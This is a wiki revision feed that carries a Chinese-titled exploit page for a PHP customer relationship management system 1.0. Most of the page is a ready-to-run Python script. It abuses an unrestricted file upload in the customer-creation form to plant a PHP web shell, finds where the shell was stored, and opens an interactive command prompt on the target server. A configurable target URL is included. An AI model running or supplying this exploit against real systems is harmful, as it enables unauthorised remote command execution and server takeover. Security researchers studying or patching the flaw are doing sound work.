https://pwnwiki.com/index.php?action=history&feed=atom&title=Customer_Relationship_Management_System_%28CRM%29_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-cn
Customer Relationship Management System (CRM) 1.0 遠程代碼執行漏洞/zh-cn - Revision history
2026-04-10T12:14:24Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Customer_Relationship_Management_System_(CRM)_1.0_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&diff=5713&oldid=prev
Pwnwiki: Created page with "Customer Relationship Management System (CRM) 1.0 远程代码执行漏洞"
2021-06-24T02:03:52Z
<p>Created page with "Customer Relationship Management System (CRM) 1.0 远程代码执行漏洞"</p>
<p><b>New page</b></p><div><languages /><br />
==影响版本==<br />
Version: 1.x<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution<br />
# Date: 21.06.2021<br />
# Exploit Author: Ishan Saha<br />
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html<br />
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip<br />
# Version: 1.x<br />
# Tested on: Ubuntu<br />
<br />
# REQUREMENTS # <br />
# run pip3 install requests colorama beautifulsoup4<br />
<br />
# DESCRIPTION #<br />
<br />
# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option<br />
<br />
# # Exploit Working:<br />
# # 1. Starting a session with the server <br />
# # 2. Registering a user hackerctf : hackerctf and adding payload in image<br />
# # 3. Finding the uploaded file location in the username image tag <br />
# # 4. Runing the payload file to give a shell<br />
<br />
<br />
#!/usr/bin/python3<br />
import requests , time<br />
from bs4 import BeautifulSoup as bs<br />
from colorama import Fore, Back, Style<br />
<br />
# Variables : change the URL according to need<br />
URL="http://192.168.0.245/crm/" # CHANGE THIS <br />
shellcode = "<?php system($_GET['cmd']);?>"<br />
filename = "shell.php"<br />
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}<br />
authdata={"username":"hackerctf","password":"hackerctf"}<br />
def format_text(title,item):<br />
cr = '\r\n'<br />
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr <br />
item=str(item)<br />
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET<br />
return text<br />
<br />
ShellSession = requests.Session()<br />
response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})<br />
response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)<br />
response = ShellSession.get(URL + "customer/")<br />
soup = bs(response.text,"html.parser")<br />
location= soup.find('img')['src']<br />
<br />
#print statements<br />
print(format_text("Target",URL),end='')<br />
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')<br />
print(format_text("shell location",location),end='')<br />
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))<br />
<br />
while True:<br />
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)<br />
if cmd == 'exit':<br />
break<br />
print(ShellSession.get(location + "?cmd="+cmd).content.decode())<br />
</pre></div>
Pwnwiki